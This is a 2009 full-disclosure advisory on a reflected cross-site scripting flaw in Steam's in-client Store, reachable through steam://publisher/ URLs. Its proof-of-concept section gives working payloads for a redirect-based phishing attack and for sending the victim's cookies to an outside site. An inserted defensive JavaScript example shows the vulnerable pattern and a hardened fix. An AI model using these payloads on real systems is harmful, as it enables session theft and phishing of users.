Date: Tue, 19 May 2009 19:34:57 -0300
From: Gabriel Lima <gabriel@...andodeseguranca.com>
To: full-disclosure@...ts.grok.org.uk
Subject: STEAM (Valve) - Phishing and Cross-site Scripting in internal browser

===========================================
=  APP: STEAM - Valve Software            =
===========================================
- STEAM < http://www.steampowered.com >
- Valve Software < http://www.valvesoftware.com >

- Vulnerability Discovery:  Gabriel Lima < gabriel (at) falandodeseguranca.com >
- http://www.falandodeseguranca.com (in Portuguese)

- Demo screenshot:
http://www.falandodeseguranca.com/wp-content/uploads/2009/05/steam-xss.jpg
===========================================
- Description -
===========================================

It is possible to inject JavaScript/HTML into the Steam Store tab (inside
the Steam application) through the Steam protocol handler (steam://), which
can be triggered from an HTML page.

"steam://publisher/<name> Loads the specified publisher catalogue in the
Store. Type the publisher's name in lowercase, e.g. activision or valve."

When a publisher name that does not exist is given, the Steam Store passes
the value on to the search system, which reflects it without sanitization
and is therefore vulnerable to XSS.

The Store tab in Steam does not display the URL, so phishing is possible
simply by redirecting the victim to a fake site.

Valve was contacted on May 10 but had not replied as of May 18.

Works in Internet Explorer.
Tested under Windows XP SP3 and Windows Vista.
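The defect described above is a reflected XSS: a value taken from the steam://publisher/<name> URL is echoed into the search page unencoded. The following is an added example (not Valve's or the author's code) showing the vulnerable reflection pattern next to a hardened one that validates the publisher name against its documented shape (lowercase words such as "activision" or "valve") and HTML-encodes it on output. The function names, the allowlist rule and the page template are assumptions; only the URL scheme and the first PoC payload come from the advisory.

```javascript
// Added example (not Valve's code): hardening the reflection of a
// steam://publisher/<name> parameter into a search page.

// Extract the publisher name from a steam://publisher/<name> URL and
// percent-decode it. Returns null for non-matching or malformed URLs.
function publisherFromSteamUrl(url) {
  const prefix = 'steam://publisher/';
  if (typeof url !== 'string' || !url.startsWith(prefix)) return null;
  try {
    return decodeURIComponent(url.slice(prefix.length));
  } catch (e) {
    return null; // malformed percent-encoding
  }
}

// Publisher catalogue names are documented as lowercase words
// (e.g. "activision", "valve"). Accept only that shape (assumed rule);
// anything else is not a publisher name and must never be echoed raw.
const PUBLISHER_NAME = /^[a-z0-9][a-z0-9-]{0,63}$/;

function isValidPublisherName(name) {
  return typeof name === 'string' && PUBLISHER_NAME.test(name);
}

// Output encoding for an HTML text context: the five characters that can
// start or end markup are replaced by their character references.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable pattern described by the advisory: the unknown publisher value
// is concatenated straight into the search page markup.
function renderSearchVulnerable(term) {
  return '<h2>Results for ' + term + '</h2>';
}

// Hardened version: validate first, and encode on output regardless, so a
// future change to the validation rule cannot reintroduce the injection.
function renderSearchHardened(term) {
  const shown = isValidPublisherName(term) ? term : 'unknown publisher';
  return '<h2>Results for ' + escapeHtml(shown) + '</h2>';
}

// Test oracle (not a general XSS filter): does the rendered body, with the
// template's own heading tags removed, still contain the start of a tag?
function containsActiveMarkup(html) {
  const body = html.replace(/^<h2>/, '').replace(/<\/h2>$/, '');
  return /<[a-zA-Z!\/]/.test(body);
}

// Constructed walk-through using the advisory's first PoC URL.
const POC_URL = "steam://publisher/<img%20src=a%20onerror=alert('xss')>";
const decoded = publisherFromSteamUrl(POC_URL);
console.log('decoded name valid?', isValidPublisherName(decoded));      // false
console.log('vulnerable output has tag?',
  containsActiveMarkup(renderSearchVulnerable(decoded)));                // true
console.log('hardened output has tag?',
  containsActiveMarkup(renderSearchHardened(decoded)));                  // false
console.log(renderSearchHardened('valve'));                              // <h2>Results for valve</h2>
```

The two defences are deliberately independent: the allowlist rejects the payload before it reaches the template, and the encoder would neutralise it even if the allowlist were loosened. Either alone would have stopped the reflection described in this advisory; together they also cover the attribute and JavaScript-string variants that the bare `<img onerror>` payload does not exercise.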


===========================================
- Proof of Concept -
===========================================

[1] Alert with text xss
steam://publisher/<img%20src=a%20onerror=alert('xss')>

[2] PHISHING (in this example, it redirects to falandodeseguranca.com )
steam://publisher/<img%20src=a%20
onerror=document.location.href='http'+String.fromCharCode(58,47,47)+'falandodeseguranca.com';>

[3] Getting cookies:
steam://publisher/<img%20src=a%20
onerror=document.location.href='http'+String.fromCharCode(58,47,47)+'falandodeseguranca.com'+String.fromCharCode(47)+document.cookie;>


===========================================
- More Information -
===========================================
A paper showing how it works, a post with screenshots and a video can be
found here:

http://www.falandodeseguranca.com/2009/05/vulnerabilidade-no-steam-phishing-e-xss-na-steam-store/
(in Portuguese)
More information: http://www.falandodeseguranca.com


Contact me: gabriel <at> falandodeseguranca.com
